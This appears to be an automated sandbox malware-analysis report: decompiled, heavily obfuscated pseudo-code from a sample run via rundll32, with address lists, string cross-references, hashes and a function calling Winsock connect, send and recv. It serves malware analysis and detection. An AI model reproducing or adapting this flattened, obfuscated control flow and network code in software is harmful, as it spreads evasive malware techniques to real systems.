				_v1660 = 0xa1ff8d;
				_v1660 = _v1660 / _t619;
				_v1660 = _v1660 ^ 0x000a69c5;
				_v1820 = 0xd15a88;
				_v1820 = _v1820 ^ 0xcd50b9e8;
				_v1820 = _v1820 >> 0x10;
				_v1820 = _v1820 ^ 0xf9319330;
				_v1820 = _v1820 ^ 0xf933c487;
				_t675 = _v1600;
				while(1) {
					L1:
					while(1) {
						L2:
						_t620 = 0x424d9d2;
						do {
							L3:
							while(_t677 != 0x19ebf08) {
								if(_t677 == _t620) {
									_push(_v1600);
									_push(_v1808);
									_t585 = E0035D389( &_v1564, _v1844, _t620,  &_v1596, _v1640, _t620);
									_t682 =  &(_t682[7]);
									__eflags = _t585;
									if(__eflags != 0) {
										E00351E67(_v1676, _v1836, _v1684, _v1692, _v1596);
										E00351E67(_v1828, _v1740, _v1748, _v1668, _v1592);
										_t682 =  &(_t682[6]);
									}
									L14:
									_t677 = 0x19ebf08;
									while(1) {
										L1:
										L2:
										_t620 = 0x424d9d2;
										goto L3;
									}
								}
								if(_t677 == 0x5bc69f5) {
									_t592 = E0035D2CE(_t620);
									__eflags = _t592 - E00343DE2(_t620);
									_t583 = 0x7574965;
									_t677 = 0x8166b1d;
									_t675 =  !=  ? 0x7574965 : 0x1e8df70;
									goto L2;
								}
								if(_t677 == 0x8166b1d) {
									__eflags = _t675 - _t583;
									if(__eflags != 0) {
										_t677 = 0xd369ee2;
										continue;
									}
									_push(_t620);
									_push(_t620);
									_t606 = E0035BB23( &_v1600, _v1616, _v1784, _v1656, _v1604, _v1756);
									_t682 =  &(_t682[6]);
									__eflags = _t606;
									if(__eflags == 0) {
										L12:
										return _t606;
									}
									_t677 = 0xd369ee2;
									goto L1;
								}
								if(_t677 == 0xb42e112) {
									_t677 = 0x5bc69f5;
									continue;
								}
								if(_t677 == 0xd369ee2) {
									E0035DA22(_v1840, _v1720, __eflags, _v1760,  &_v1044, _t620, _v1716);
									 *((short*)(E0034B6CF( &_v1044, _v1624, _v1728, _v1752))) = 0;
									E00348969(_v1688,  &_v524, __eflags, _v1620, _v1696);
									_push(_v1632);
									_push(_v1744);
									E003447CE( &_v1044, _v1672, _v1680, _v1832, _v1612, E0035DCF7(_v1680, 0x341328, __eflags),  &_v524, _v1776, _v1712);
									E0034A8B0(_v1704, _t598, _v1800);
									_t603 = E0034EA99(_v1664, _t609, _v1824, _v1764,  &_v1564, _v1736);
									_t682 =  &(_t682[0x17]);
									__eflags = _t603;
									if(__eflags != 0) {
										_t583 = 0x7574965;
										__eflags = _t675 - 0x7574965;
										_t620 = 0x424d9d2;
										_t677 =  ==  ? 0x424d9d2 : 0xe2e667c;
										continue;
									}
									goto L14;
								}
								_t696 = _t677 - 0xe2e667c;
								if(_t677 != 0xe2e667c) {
									goto L25;
								}
								_push(_v1804);
								_push( &_v1564);
								_push(_t620);
								_push(0);
								_push( &_v1596);
								_push(_v1652);
								_push(0);
								_t606 = E0034AB87(_v1796, _v1724, _t696);
								if(_t606 == 0) {
									goto L12;
								}
								E00351E67(_v1644, _v1708, _v1768, _v1788, _v1596);
								return E00351E67(_v1628, _v1772, _v1780, _v1636, _v1592);
							}
							E00351E67(_v1812, _v1732, _v1660, _v1820, _v1600);
							_t682 =  &(_t682[3]);
							_t677 = 0xe6feec1;
							_t583 = 0x7574965;
							_t620 = 0x424d9d2;
							L25:
							__eflags = _t677 - 0xe6feec1;
						} while (__eflags != 0);
						return _t583;
					}
				}
			}

0x00356df8
0x00356dfe
0x00356e0b
0x00356e14
0x00356e1b
0x00356e22
0x00356e2d
0x00356e38
0x00356e40
0x00356e4b
0x00356e53
0x00356e64
0x00356e68
0x00356e6a
0x00356e6f
0x00356e74
0x00356e7c
0x00356e87
0x00356e92
0x00356e9d
0x00356ea8
0x00356eb0
0x00356ebb
0x00356ec3
0x00356ecb
0x00356ed3
0x00356edb
0x00356ee3
0x00356ef7
0x00356efc
0x00356f05
0x00356f10
0x00356f18
0x00356f20
0x00356f28
0x00356f30
0x00356f38
0x00356f43
0x00356f4b
0x00356f56
0x00356f5e
0x00356f63
0x00356f6b
0x00356f73
0x00356f7b
0x00356f80
0x00356f89
0x00356f8a
0x00356f8e
0x00356f96
0x00356fa1
0x00356fa9
0x00356fb4
0x00356fbf
0x00356fc7
0x00356fd5
0x00356fd9
0x00356fe1
0x00356fec
0x00356ff7
0x00357002
0x0035700d
0x00357020
0x00357027
0x00357032
0x0035703d
0x00357050
0x00357055
0x0035705e
0x00357069
0x00357071
0x00357079
0x00357081
0x00357089
0x00357094
0x0035709f
0x003570aa
0x003570b5
0x003570c0
0x003570cb
0x003570d6
0x003570e1
0x003570ec
0x003570fe
0x00357103
0x0035710c
0x00357117
0x0035711f
0x00357129
0x0035712c
0x00357130
0x00357138
0x0035714b
0x00357152
0x0035715d
0x00357168
0x00357173
0x0035717e
0x00357186
0x0035718e
0x00357193
0x0035719b
0x003571a3
0x003571b6
0x003571bd
0x003571c8
0x003571d0
0x003571d5
0x003571da
0x003571e2
0x003571ea
0x00357200
0x00357207
0x0035720f
0x0035721a
0x00357225
0x00357230
0x0035723b
0x00357248
0x00357249
0x00357253
0x00357257
0x0035725c
0x00357264
0x0035726f
0x0035727a
0x00357285
0x00357296
0x00357299
0x0035729d
0x003572a5
0x003572ad
0x003572b5
0x003572bd
0x003572c7
0x003572cb
0x003572d3
0x003572e6
0x003572ed
0x003572f8
0x00357303
0x0035730e
0x00357319
0x00357324
0x0035732c
0x00357344
0x00357348
0x00357350
0x00357363
0x00357366
0x0035736d
0x00357378
0x00357380
0x00357388
0x0035738d
0x00357395
0x0035739d
0x003573a8
0x003573b0
0x003573bb
0x003573c3
0x003573cb
0x003573d0
0x003573d5
0x003573dd
0x003573e8
0x003573f0
0x003573fb
0x0035740f
0x00357416
0x00357421
0x0035742e
0x00357432
0x0035743a
0x0035743f
0x00357447
0x0035744f
0x00357454
0x00357459
0x00357461
0x0035746e
0x00357472
0x0035747a
0x00357482
0x0035748d
0x00357498
0x003574a3
0x003574ab
0x003574b0
0x003574be
0x003574c8
0x003574cc
0x003574d4
0x003574df
0x003574f5
0x003574fe
0x00357509
0x00357514
0x0035751f
0x0035752a
0x00357532
0x00357537
0x0035753c
0x00357541
0x00357549
0x00357554
0x0035755c
0x00357567
0x00357572
0x0035757a
0x00357585
0x00357590
0x0035759d
0x0035759e
0x003575a2
0x003575a7
0x003575af
0x003575b7
0x003575c1
0x003575c5
0x003575cd
0x003575d5
0x003575e8
0x003575ef
0x003575fa
0x00357602
0x0035760a
0x00357612
0x0035761a
0x00357622
0x0035762a
0x0035762f
0x00357637
0x0035763f
0x00357647
0x00357652
0x0035765a
0x00357665
0x0035766d
0x00357675
0x0035767d
0x00357685
0x00357690
0x0035769b
0x003576a6
0x003576b1
0x003576c5
0x003576cc
0x003576d7
0x003576df
0x003576e7
0x003576ec
0x003576f4
0x003576fc
0x00357703
0x00357703
0x00357708
0x00357708
0x00357708
0x0035770d
0x00000000
0x0035770d
0x00357717
0x0035799c
0x003579aa
0x003579ca
0x003579cf
0x003579d2
0x003579d4
0x003579fa
0x00357a1f
0x00357a24
0x00357a24
0x003578e9
0x003578e9
0x00357703
0x00357703
0x00357708
0x00357708
0x00000000
0x00357708
0x00357703
0x00357723
0x00357977
0x00357983
0x0035798a
0x0035798f
0x00357994
0x00000000
0x00357994
0x0035772f
0x00357913
0x00357915
0x00357957
0x00000000
0x00357957
0x00357917
0x00357918
0x0035793d
0x00357942
0x00357945
0x00357947
0x003577e4
0x003577e4
0x003577e4
0x0035794d
0x00000000
0x0035794d
0x0035773b
0x00357909
0x00000000
0x00357909
0x00357747
0x00357804
0x0035783e
0x00357848
0x0035784d
0x00357859
0x003578a6
0x003578b8
0x003578dd
0x003578e2
0x003578e5
0x003578e7
0x003578f0
0x003578fa
0x003578fc
0x00357901
0x00000000
0x00357901
0x00000000
0x003578e7
0x0035774d
0x00357753
0x00000000
0x00000000
0x00357759
0x00357764
0x00357765
0x00357766
0x0035776f
0x00357770
0x00357782
0x00357784
0x0035778e
0x00000000
0x00000000
0x003577ad
0x00000000
0x003577d7
0x00357a49
0x00357a4e
0x00357a51
0x00357a56
0x00357a5b
0x00357a60
0x00357a60
0x00357a60
0x00000000
0x0035770d
0x00357708

Strings

CmN, xrefs: 00356E9D
^P>, xrefs: 00357032
;X, xrefs: 00357285
UoZ, xrefs: 00357472
ci1, xrefs: 00356E4B
>GU, xrefs: 00356F96
G^FX, xrefs: 00356EDB
X9, xrefs: 00357069
1?o, xrefs: 003574D4
v(, xrefs: 00357378
bZ, xrefs: 003574DF
f, xrefs: 00356E92

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 1?o$;X$>GU$CmN$G^FX$UoZ$^P>$bZ$ci1$X9$f$v(
API String ID: 0-2206596976
Opcode ID: 6edfb3af1c601d015408cdcdda274e7cf49ba8af4a22517bba5e5630c1cfc350
Instruction ID: a0676d6eafaa0347f99971460167e871cce985c5c56344f3edabb1642d34f2bf
Opcode Fuzzy Hash: 6edfb3af1c601d015408cdcdda274e7cf49ba8af4a22517bba5e5630c1cfc350
Instruction Fuzzy Hash: 8A52FC715083819BD379CF21D58AB9FBBE1BBC4308F108A1DE5DA9A260D7B18949CF53

Uniqueness

Uniqueness Score: -1.00%

Function 10012C30 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 156networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 10012C6C
connect.WS2_32(?,?,00000010), ref: 10012CA7
_strcat.LIBCMT ref: 10012CE9
send.WS2_32(?,?,00000064,00000000), ref: 10012D06
recv.WS2_32(000000FF,?,00000064,00000000), ref: 10012D9D

Part of subcall function 1001DDF4: IsWindow.USER32(?), ref: 1001DE03

Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7

Part of subcall function 1001DD46: GetDlgItem.USER32(?,503BE811), ref: 1001DD53

Part of subcall function 1001DDF4: SetWindowTextA.USER32(?,00000064), ref: 1001DE2B

Strings

Wait..., xrefs: 10012CB1
Disconnected, xrefs: 10012E4A
Connected, xrefs: 10012D4C

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Window$EnableItemText_memset_strcatconnectrecvsend
String ID: Connected$Disconnected$Wait...
API String ID: 2263617321-2304371739
Opcode ID: 5b08e9dbcbe72183f65bc00083dd8b9667ad7d5dfeacba7cbb0734b26863e533
Instruction ID: 809deafcd8a1ebdff950075e8a5ab3cba01c3ccaf73ffb16f134ff4a091f78a6
Opcode Fuzzy Hash: 5b08e9dbcbe72183f65bc00083dd8b9667ad7d5dfeacba7cbb0734b26863e533
Instruction Fuzzy Hash: 88513DB4A002189BDB14EBA8CC95BEEB7B1FF48308F104169E5066F2C2DF75A991CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00342251 Relevance: 14.1, Strings: 11, Instructions: 340
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00342251(void* __ecx, signed int* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				void* _t323;
				signed int _t369;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				signed int _t374;
				signed int _t375;
				signed int _t376;
				signed int _t377;
				signed int _t378;
				signed int _t379;
				void* _t382;
				signed int* _t424;
				void* _t427;
				void* _t428;
				void* _t431;

				_t425 = _a4;
				_push(_a12);
				_t424 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003520B9(_t323);
				_v104 = 0xfd7ba2;
				_t428 = _t427 + 0x14;
				_v104 = _v104 << 2;
				_v104 = _v104 ^ 0x03f5ee88;
				_t382 = 0x3e8dc94;
				_v112 = 0x53a35e;
				_t371 = 0x1c;
				_v112 = _v112 / _t371;
				_v112 = _v112 << 0xb;
				_v112 = _v112 ^ 0x17ec1018;
				_v100 = 0x45b9a1;
				_v100 = _v100 + 0xffff7cfc;
				_v100 = _v100 ^ 0x004aa95b;
				_v92 = 0xd93693;
				_v92 = _v92 + 0xb87a;
				_v92 = _v92 ^ 0x00df4f59;
				_v160 = 0x746cf1;
				_v160 = _v160 ^ 0x2b133776;
				_v160 = _v160 + 0xffff944c;
				_v160 = _v160 / _t371;
				_v160 = _v160 ^ 0x0189d9d1;
				_v144 = 0x9ec305;
				_v144 = _v144 + 0xffffd43e;
				_v144 = _v144 << 3;
				_v144 = _v144 ^ 0x04f670ec;
				_v148 = 0x64c482;
				_v148 = _v148 + 0x3823;
				_t372 = 0x6f;
				_v148 = _v148 / _t372;
				_v148 = _v148 ^ 0x000f1a49;
				_v68 = 0x131d36;
				_v68 = _v68 ^ 0xb06b804d;
				_v68 = _v68 ^ 0xb072f73d;
				_v124 = 0xcf68d3;
				_v124 = _v124 + 0x418a;
				_v124 = _v124 + 0xdb2c;
				_v124 = _v124 ^ 0x00d4c88c;
				_v140 = 0x60ea9a;
				_v140 = _v140 >> 0xa;
				_v140 = _v140 >> 4;
				_v140 = _v140 ^ 0x0002f747;
				_v116 = 0xa906b8;
				_t373 = 0x61;
				_v116 = _v116 * 0x66;
				_v116 = _v116 / _t373;
				_v116 = _v116 ^ 0x00b9e105;
				_v152 = 0x1b4b23;
				_v152 = _v152 + 0x6529;
				_v152 = _v152 << 7;
				_v152 = _v152 ^ 0x0dd37b6c;
				_v56 = 0xb64e13;
				_t374 = 0x36;
				_v56 = _v56 / _t374;
				_v56 = _v56 ^ 0x000ccadc;
				_v180 = 0xa61587;
				_v180 = _v180 ^ 0x79fc160a;
				_t375 = 0x7a;
				_v180 = _v180 * 0x16;
				_v180 = _v180 ^ 0x4f1bf23d;
				_v180 = _v180 ^ 0x22abe71e;
				_v120 = 0x473252;
				_v120 = _v120 + 0xffff4692;
				_v120 = _v120 / _t375;
				_v120 = _v120 ^ 0x000f54d2;
				_v60 = 0x2fd158;
				_v60 = _v60 + 0x5b64;
				_v60 = _v60 ^ 0x0034a0e9;
				_v84 = 0xc57bbf;
				_v84 = _v84 ^ 0x7beef004;
				_v84 = _v84 ^ 0x7b204221;
				_v52 = 0xc39e48;
				_t376 = 0x4d;
				_v52 = _v52 / _t376;
				_v52 = _v52 ^ 0x0006d078;
				_v108 = 0x102acf;
				_v108 = _v108 >> 0xa;
				_v108 = _v108 ^ 0x000242b6;
				_v80 = 0xaaee53;
				_t377 = 0x79;
				_v80 = _v80 * 0x74;
				_v80 = _v80 ^ 0x4d7dabdb;
				_v88 = 0x1ad2b9;
				_v88 = _v88 | 0x310da8db;
				_v88 = _v88 ^ 0x311cb062;
				_v136 = 0x81cc6c;
				_v136 = _v136 >> 0xc;
				_v136 = _v136 << 0xd;
				_v136 = _v136 ^ 0x0107e876;
				_v96 = 0x2bc0c4;
				_v96 = _v96 * 0x4c;
				_v96 = _v96 ^ 0x0cfd01fe;
				_v176 = 0x403c4e;
				_t174 =  &_v176; // 0x403c4e
				_v176 =  *_t174 / _t377;
				_t180 =  &_v176; // 0x403c4e
				_v176 =  *_t180 * 0x5e;
				_v176 = _v176 << 5;
				_v176 = _v176 ^ 0x0632c8a8;
				_v44 = 0x1618ce;
				_v44 = _v44 + 0xffff8813;
				_v44 = _v44 ^ 0x00124c47;
				_v76 = 0x551030;
				_v76 = _v76 + 0x65ef;
				_v76 = _v76 ^ 0x005f521e;
				_v132 = 0xb7ed4f;
				_v132 = _v132 << 0xb;
				_v132 = _v132 >> 0xa;
				_v132 = _v132 ^ 0x002e4b92;
				_v64 = 0xfb13c3;
				_v64 = _v64 * 0x16;
				_v64 = _v64 ^ 0x159ca6b2;
				_v168 = 0x8e8363;
				_v168 = _v168 ^ 0x49fc5726;
				_v168 = _v168 >> 8;
				_v168 = _v168 >> 4;
				_v168 = _v168 ^ 0x0002bf0f;
				_v72 = 0x8b4c84;
				_t378 = 0x68;
				_v72 = _v72 / _t378;
				_v72 = _v72 ^ 0x00015b8a;
				_v128 = 0x282e65;
				_v128 = _v128 >> 3;
				_v128 = _v128 << 9;
				_v128 = _v128 ^ 0x0a079d52;
				_v156 = 0xadd370;
				_t379 = 0x3e;
				_v156 = _v156 / _t379;
				_v156 = _v156 << 0xf;
				_v156 = _v156 + 0xffff35e7;
				_v156 = _v156 ^ 0x66d9d095;
				_v164 = 0xb0b7ce;
				_v164 = _v164 + 0xffffdc7a;
				_v164 = _v164 * 0x61;
				_v164 = _v164 + 0xffff24b0;
				_v164 = _v164 ^ 0x42ea90cd;
				_v172 = 0xee7b33;
				_v172 = _v172 | 0x904c1683;
				_v172 = _v172 * 0x2c;
				_v172 = _v172 >> 4;
				_v172 = _v172 ^ 0x0e8d9d52;
				_v48 = 0xdaf5e6;
				_v48 = _v48 ^ 0xf4ca4d64;
				_v48 = _v48 ^ 0xf41f1779;
				goto L1;
				do {
					while(1) {
						L1:
						_t431 = _t382 - 0x9c1484f;
						if(_t431 > 0) {
							break;
						}
						if(_t431 == 0) {
							E00343DBC( &_v40, _t424, _v160, _v144, _v148);
							_t428 = _t428 + 0xc;
							_t382 = 0x9229f3e;
							continue;
						} else {
							if(_t382 == 0x3e8dc94) {
								_t382 = 0xb0d10f2;
								 *_t424 =  *_t424 & 0x00000000;
								_t424[1] = _v104;
								continue;
							} else {
								if(_t382 == 0x73dcb22) {
									E00350DAF(_v176,  &_v40, _v44,  *((intOrPtr*)(_t425 + 0x44)), _v76, _v132);
									_t428 = _t428 + 0x10;
									_t382 = 0xca0d778;
									continue;
								} else {
									if(_t382 == 0x8cfc35c) {
										E00350DAF(_v60,  &_v40, _v84,  *((intOrPtr*)(_t425 + 0x3c)), _v52, _v108);
										_t428 = _t428 + 0x10;
										_t382 = 0xfa9ed0f;
										continue;
									} else {
										if(_t382 == 0x9229f3e) {
											E00360E3A( &_v40, _v68, __eflags, _v124, _v140, _v116, _t425 + 0x1c);
											_t428 = _t428 + 0x10;
											_t382 = 0xa7e786e;
											continue;
										} else {
											if(_t382 != 0x95701e8) {
												goto L24;
											} else {
												_push(_t382);
												_push(_t382);
												_t369 = E00347FF2(_t424[1]);
												 *_t424 = _t369;
												if(_t369 != 0) {
													_t382 = 0x9c1484f;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L27:
						__eflags =  *_t424;
						_t322 =  *_t424 != 0;
						__eflags = _t322;
						return 0 | _t322;
					}
					__eflags = _t382 - 0xa7e786e;
					if(_t382 == 0xa7e786e) {
						E00350DAF(_v152,  &_v40, _v56,  *((intOrPtr*)(_t425 + 0x48)), _v180, _v120);
						_t428 = _t428 + 0x10;
						_t382 = 0x8cfc35c;
						goto L24;
					} else {
						__eflags = _t382 - 0xa84b454;
						if(__eflags == 0) {
							E00360E3A( &_v40, _v156, __eflags, _v164, _v172, _v48, _t425 + 0x14);
						} else {
							__eflags = _t382 - 0xb0d10f2;
							if(_t382 == 0xb0d10f2) {
								_t424[1] = E0035C631(_t425);
								_t382 = 0x95701e8;
								goto L1;
							} else {
								__eflags = _t382 - 0xca0d778;
								if(_t382 == 0xca0d778) {
									E00350DAF(_v64,  &_v40, _v168,  *_t425, _v72, _v128);
									_t428 = _t428 + 0x10;
									_t382 = 0xa84b454;
									goto L1;
								} else {
									__eflags = _t382 - 0xfa9ed0f;
									if(_t382 != 0xfa9ed0f) {
										goto L24;
									} else {
										E00350DAF(_v80,  &_v40, _v88,  *((intOrPtr*)(_t425 + 0x30)), _v136, _v96);
										_t428 = _t428 + 0x10;
										_t382 = 0x73dcb22;
										goto L1;
									}
								}
							}
						}
					}
					goto L27;
					L24:
					__eflags = _t382 - 0xd4a25d5;
				} while (__eflags != 0);
				goto L27;
			}

0x0034225a
0x00342262
0x00342269
0x0034226b
0x00342272
0x00342273
0x00342274
0x00342275
0x0034227a
0x00342282
0x00342285
0x0034228c
0x00342294
0x00342299
0x003422a7
0x003422ac
0x003422b0
0x003422b5
0x003422bd
0x003422c5
0x003422cd
0x003422d5
0x003422dd
0x003422e5
0x003422ed
0x003422f5
0x003422fd
0x0034230d
0x00342313
0x0034231b
0x00342323
0x0034232b
0x00342330
0x00342338
0x00342340
0x0034234c
0x00342351
0x00342357
0x0034235f
0x0034236a
0x00342375
0x00342380
0x00342388
0x00342390
0x00342398
0x003423a0
0x003423a8
0x003423ad
0x003423b2
0x003423ba
0x003423c7
0x003423c8
0x003423d2
0x003423d6
0x003423de
0x003423e6
0x003423ee
0x003423f3
0x003423fd
0x00342411
0x00342416
0x0034241f
0x0034242a
0x00342432
0x0034243f
0x00342442
0x00342446
0x0034244e
0x00342456
0x0034245e
0x0034246e
0x00342472
0x0034247a
0x00342485
0x00342490
0x0034249b
0x003424a3
0x003424ab
0x003424b3
0x003424c5
0x003424ca
0x003424d3
0x003424de
0x003424e6
0x003424eb
0x003424f3
0x00342500
0x00342501
0x00342505
0x0034250d
0x00342515
0x0034251d
0x00342525
0x0034252d
0x00342532
0x00342537
0x0034253f
0x0034254c
0x00342550
0x00342558
0x00342560
0x00342566
0x0034256a
0x0034256f
0x00342573
0x00342578
0x00342580
0x0034258b
0x00342596
0x003425a1
0x003425a9
0x003425b1
0x003425b9
0x003425c1
0x003425c6
0x003425cb
0x003425d3
0x003425e6
0x003425ed
0x003425f8
0x00342600
0x00342608
0x0034260d
0x00342612
0x0034261c
0x00342635
0x0034263a
0x00342643
0x0034264e
0x00342656
0x0034265b
0x00342660
0x00342668
0x00342674
0x0034267c
0x00342680
0x00342685
0x0034268d
0x00342695
0x0034269d
0x003426aa
0x003426ae
0x003426b6
0x003426be
0x003426c6
0x003426d3
0x003426d7
0x003426dc
0x003426e4
0x003426ef
0x003426fa
0x003426fa
0x00342705
0x00342705
0x00342705
0x00342705
0x00342707
0x00000000
0x00000000
0x0034270d
0x0034282a
0x0034282f
0x00342832
0x00000000
0x00342713
0x00342719
0x00342808
0x0034280a
0x0034280d
0x00000000
0x0034271f
0x00342725
0x003427f2
0x003427f7
0x003427fa
0x00000000
0x0034272b
0x00342731
0x003427c0
0x003427c5
0x003427c8
0x00000000
0x00342733
0x00342739
0x0034278b
0x00342790
0x00342793
0x00000000
0x0034273b
0x00342741
0x00000000
0x00342747
0x00342756
0x00342757
0x00342758
0x0034275d
0x00342763
0x00342769
0x00000000
0x00342769
0x00342763
0x00342741
0x00342739
0x00342731
0x00342725
0x00342719
0x0034293e
0x00342940
0x00342945
0x00342945
0x0034294f
0x0034294f
0x0034283c
0x00342842
0x003428fd
0x00342902
0x00342905
0x00000000
0x00342848
0x00342848
0x0034284e
0x00342936
0x00342854
0x00342854
0x00342856
0x003428d3
0x003428d6
0x00000000
0x00342858
0x00342858
0x0034285e
0x003428ba
0x003428bf
0x003428c2
0x00000000
0x00342860
0x00342860
0x00342866
0x00000000
0x0034286c
0x00342889
0x0034288e
0x00342891
0x00000000
0x00342891
0x00342866
0x0034285e
0x00342856
0x0034284e
0x00000000
0x0034290a
0x0034290a
0x0034290a
0x00000000

Strings

3{, xrefs: 003426BE
N<@, xrefs: 00342560
e, xrefs: 003425A9
d[, xrefs: 00342485
)e, xrefs: 003423E6
nx~, xrefs: 00342793
R2G, xrefs: 00342456
!B {, xrefs: 003424AB
nx~, xrefs: 0034283C
e.(, xrefs: 0034264E
#8, xrefs: 00342340

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: !B {$#8$)e$3{$N<@$R2G$d[$e.($nx~$nx~$e
API String ID: 0-245365489
Opcode ID: d6ff080ff9f5287ceac9ee7533765cfdb866e133be372a7cbfdcda9caf8f2759
Instruction ID: dbed5eba55533a6259864fe9e217b455bc711a5a5d3247500f51a6b89a4014ed
Opcode Fuzzy Hash: d6ff080ff9f5287ceac9ee7533765cfdb866e133be372a7cbfdcda9caf8f2759
Instruction Fuzzy Hash: 82F140715083809FD369CF61C48AA5BFBE1FBD4348F50891DF29A8A261D7B29958CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00349714 Relevance: 14.0, Strings: 11, Instructions: 232
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00349714(void* __ecx, void* __edx) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t251;
				intOrPtr _t252;
				intOrPtr _t253;
				void* _t257;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				void* _t292;
				void* _t293;
				signed int* _t296;
				signed int* _t297;

				_t296 =  &_v104;
				_v4 = _v4 & 0x00000000;
				_v12 = 0xc5b764;
				_v8 = 0xb6da07;
				_v100 = 0x6b81aa;
				_v100 = _v100 ^ 0x5133456b;
				_t8 =  &_v100; // 0x5133456b
				_v100 =  *_t8 * 0x6e;
				_t292 = __edx;
				_v100 = _v100 << 0xa;
				_v100 = _v100 ^ 0x922ec96f;
				_t257 = __ecx;
				_v20 = 0x2c208b;
				_t293 = 0x52ffaa2;
				_v20 = _v20 + 0xffff37e6;
				_v20 = _v20 ^ 0x00212911;
				_v60 = 0xb21c01;
				_v60 = _v60 ^ 0x31980a41;
				_v60 = _v60 + 0xffff033c;
				_v60 = _v60 ^ 0x31255444;
				_v64 = 0x612501;
				_v64 = _v64 << 2;
				_v64 = _v64 + 0xf44;
				_v64 = _v64 ^ 0x018d6347;
				_v52 = 0x111460;
				_v52 = _v52 + 0xffffc2ff;
				_v52 = _v52 | 0x8d441097;
				_v52 = _v52 ^ 0x8d5fe5cb;
				_v56 = 0xb6e38a;
				_t259 = 0x67;
				_v56 = _v56 / _t259;
				_t260 = 0x41;
				_v56 = _v56 * 0x32;
				_v56 = _v56 ^ 0x00536033;
				_v96 = 0xaa1e09;
				_v96 = _v96 / _t260;
				_t261 = 0x73;
				_v96 = _v96 * 0xd;
				_v96 = _v96 / _t261;
				_v96 = _v96 ^ 0x00047537;
				_v88 = 0xebbfc;
				_v88 = _v88 << 7;
				_v88 = _v88 | 0x3053ba58;
				_t262 = 0x7f;
				_v88 = _v88 / _t262;
				_v88 = _v88 ^ 0x006c206b;
				_v44 = 0xece271;
				_v44 = _v44 + 0xffff86ef;
				_v44 = _v44 + 0x6a70;
				_v44 = _v44 ^ 0x00eb9b45;
				_v48 = 0xd70038;
				_v48 = _v48 | 0x378b661e;
				_v48 = _v48 ^ 0xfc23f8e2;
				_v48 = _v48 ^ 0xcbf8b4c1;
				_v92 = 0x86f3ef;
				_v92 = _v92 << 0xd;
				_v92 = _v92 >> 0xd;
				_v92 = _v92 + 0x4513;
				_v92 = _v92 ^ 0x000ef1b6;
				_v80 = 0x7a204;
				_v80 = _v80 + 0xffffa60a;
				_v80 = _v80 | 0x4d150135;
				_v80 = _v80 + 0xffff9d32;
				_v80 = _v80 ^ 0x4d179d3b;
				_v40 = 0x124198;
				_v40 = _v40 ^ 0x5335feb3;
				_t263 = 0x78;
				_v40 = _v40 * 0x18;
				_v40 = _v40 ^ 0xcbb00a78;
				_v84 = 0xcaa24a;
				_v84 = _v84 * 0x42;
				_v84 = _v84 ^ 0x45be5790;
				_v84 = _v84 + 0xffff0d2f;
				_v84 = _v84 ^ 0x718e360f;
				_v24 = 0x4d7038;
				_v24 = _v24 | 0x28b75b7a;
				_v24 = _v24 ^ 0x28f4655f;
				_v28 = 0x844762;
				_v28 = _v28 ^ 0xe0e1df8a;
				_v28 = _v28 ^ 0xe064bc9e;
				_v32 = 0xfc2930;
